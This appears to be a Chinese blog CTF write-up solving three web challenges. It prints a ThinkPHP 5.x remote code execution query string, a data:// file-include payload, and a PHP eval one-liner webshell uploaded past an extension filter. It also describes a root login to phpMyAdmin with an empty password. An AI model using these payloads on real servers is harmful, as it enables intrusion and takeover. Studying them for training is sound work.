攻防世界_WEB:<php rce> <Web_php_include> <upload1>

最新推荐文章于 2024-05-16 14:53:01 发布
最新推荐文章于 2024-05-16 14:53:01 发布
阅读量246 收藏
点赞数
分类专栏: CTF_WEB_wp 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46110224/article/details/107907324
版权

WEB高手区

php rce

在这里插入图片描述首先拿到就把所有的按钮点了一遍,但是好像都挺正常的。
搜索了之后发现ThinkPHP5.1存在代码执行漏洞,也得到了相应的代码。

远程执行命令payload(不唯一):s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写文件payload(不唯一):?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell1.php&vars[1][]=<?phpinfo();?>i

稍加修改,查找有关flag的文件

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

在这里插入图片描述显示目录路径以及文件名称,继续使用cat 命令显示信息

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

在这里插入图片描述

Web_php_include

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>
/*
过滤了php://伪协议
php协议有 php://   data    phar:// 等等
*/

第一种方法
构造data伪协议 ?page=data://text/plain,<?php%20system("ls")?>
在这里插入图片描述在用cat 命令显示内容 ?page=data://text/plain,<?php%20system("cat%20fl4gisisish3r3.php")?>
flag在网页源码中
在这里插入图片描述ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}
第二种方法
在扫描的时候发现了,phpmyadmin,想试一下进入数据库,进入后账号root,密码为空,直接登录。
登陆后写入一句话木马在这里插入图片描述使用蚁剑连接在这里插入图片描述
在这里插入图片描述

upload1

第一种方法
在这里插入图片描述
限制上传png以及jpg图片文件,我们先写个一句话木马<?php @eval($_POST['hello']);?>,保存为png格式进行上传,然后使用burpsuit拦截包,修改文件后缀
在这里插入图片描述显示路径
在这里插入图片描述然后使用蚁剑链接即可获得flag

第二种方法
在这里插入图片描述
检察源码时发现了check()函数,此函数是进行过滤,所以我们也可以直接将此函数删除再进行直接上传我们的一句话木马php文件。
在这里插入图片描述
上传成功,之后使用蚁剑即可。

第四周 2020/8/10

Automan之鸿鹄
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
[ctf web]web题中php经常遇到的函数
ShenZ的博客
07-24 1148
函数 substr call_user_func 把第一个参数作为回调函数调用 版本 说明 5.3.0 对面向对象里面的关键字的解析有所增强。在此之前,使用两个冒号来连接一个类和里面的一个方法,把它作为参数来作为回调函数的话,将会发出一个**E_STRICT**的警告,因为这个传入的参数被视为静态方法。 用call_user_func()来调用一个类里面的方法 <?php class myclass { static function say_hello() {
CTF_WP-攻防世界web题解(1),2024年最新网络安全零基础
2401_83974607的博客
04-17 1096
题目描述:想想初始页面?尝试访问index.php,没反应,返回结果一样用dirbuster扫描一下,发现果然有个index.php,并且大小跟1不一样,并且返回码是302再次尝试访问,还是不行搜索得知,302是被重定向了用burpsuit抓包发送,flag被隐藏,查看headerflag藏在报文头里备份文件搜索得知:php的备份有两种:.php~和.php.bak修改urlindex.php.bak自动下载了一个文件,打开发现flag打开链接是一个维基百科的说明,
蚁剑的分析和利用
m0_59598029的博客
02-15 812
这篇文章主要是以虚拟终端模块执行命令功能为例,逐步分析,并通过分析结果优化对应脚本的方法。
2024年最新CTF_WP-攻防世界web题解,从零开始学数据结构和算法
2401_84264536的博客
05-11 478
题目描述:想想初始页面?尝试访问index.php,没反应,返回结果一样用dirbuster扫描一下,发现果然有个index.php,并且大小跟1不一样,并且返回码是302再次尝试访问,还是不行搜索得知,302是被重定向了用burpsuit抓包发送,flag被隐藏,查看headerflag藏在报文头里备份文件搜索得知:php的备份有两种:.php~和.php.bak修改urlindex.php.bak自动下载了一个文件,打开发现flag打开链接是一个维基百科的说明,
ctf】命令执行漏洞(一)
wlllllianqing的博客
10-12 2069
命令执行漏洞原理 命令执行漏洞,就是指用户通过浏览器或其他辅助程序提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,用户可以提交恶意语句并交由服务器执行。 在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。 相关函数 ...
BUUCTF WEB [网鼎杯 2020 朱雀组]phpweb
Y1da的博客
04-27 360
BUUCTF WEB [网鼎杯 2020 朱雀组]phpweb 进入环境,发现调用了date()函数,抓包后发现POST传参存在名为func,值为date的变量 尝试修改func变量 func=echo&p=Y-m-d+h%3Ai%3As+a 回显 Warning : call_user_func() expects parameter 1 to be a valid callback, function 'echo' not found or invalid function nam
RCE_1131:iOS 11.3.1 RCE漏洞利用
04-28
!!! 不适用于最终用户!!! 这仅对开发人员感兴趣,不希望以任何形状或形式提供支持! 此漏洞利用通过两个已知的错误从WebContent沙箱(即从网站)获得tfp0:CVE-2018-4233(由saelo发现,由ZDI报告,由niklasb...
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
tongda_rce:通达OA RCE国防
03-13
介绍: 近日,通达OA系统遭到勒索病毒攻击。经过分析发生的事件是由未授权文件上传+文件包含引起的 用法: python3 tongda_rce.py网址 截屏:
RCE_Web_Shell_Python:与Web Shell交互的python方法
05-27
使用Python与Web Shell进行交互 无论您是经验丰富的渗透测试员还是初学者,渗透测试的领域都是一英里长和一英里深。 所有学科中的机会是无止境的。 进攻安全性提供了一个高级课程,称为高级Web攻击和利用(AWAE) ,...
shiro_rce_tool:shiro rce tool 反序列 命令执行 一键工具 回显
04-29
shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31: 新增自定义或随机useragent randomagent --> random useragent useragent= --> set useragent cookiename= --&...
call_user_func 和call_user_func_array 简单的用法
chaojie2009的专栏
09-29 654
function test($arg1,$arg2){ echo $arg1; echo $arg2; } call_user_func_array('test',array('555','666')); call_user_func('test','111','222'); call_user_func('test','333','444'); //输出:555 666 111 222 3
CTF 总结01:文件上传绕过
weixin_42789937的博客
12-11 5896
文件上传的番外,一句话木马绕过思路,第二版整理,还是会根据做题经验增补的~
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现
yzl_007的博客
08-04 1148
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现 影响范围 ThinkPHP 5.0.全版本 5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞。 漏洞复现 远程代码执行 直接get请求即可 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd pw
蚁剑的使用以及用蚁剑做一道ctf
weixin_49392641的博客
12-15 3380
一.蚁剑的介绍及下载 1.蚁剑是一款和菜刀相像的shell控制端软件,主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 2.蚁剑的下载 这是gethub的官方下载地址 供大家下载 3.蚁剑的安装 点击初始化就完成安装,再次点击AntSword.exe打开 二.蚁剑的使用 下面我就用一道ctf题来展示蚁剑的基本简单的使用。 1.找到一道ctf题目点击打开可以看到 题目中我们能得到几个很重要的提示1.白给的shell 2.菜刀丢了 3.提示eval和Syc。 2.我们可以用到我们刚刚下载的工
安全攻防知识-7】CTFweb(1)
qq_26579613的博客
06-01 4266
ctf-web题型总结
CTF-WEB攻防世界题目实战解析weak_auth
2301_76565920的博客
04-20 1172
题目:weak_auth(弱认证) 难度:1
CTF-WEB攻防世界题目实战解析baby_web_ctf web游戏提示
最新发布
2401_84969915的博客
05-16 300
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
攻防世界php_rce
08-26
<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [攻防世界-web篇(php_rce)详解]...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Automan之鸿鹄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值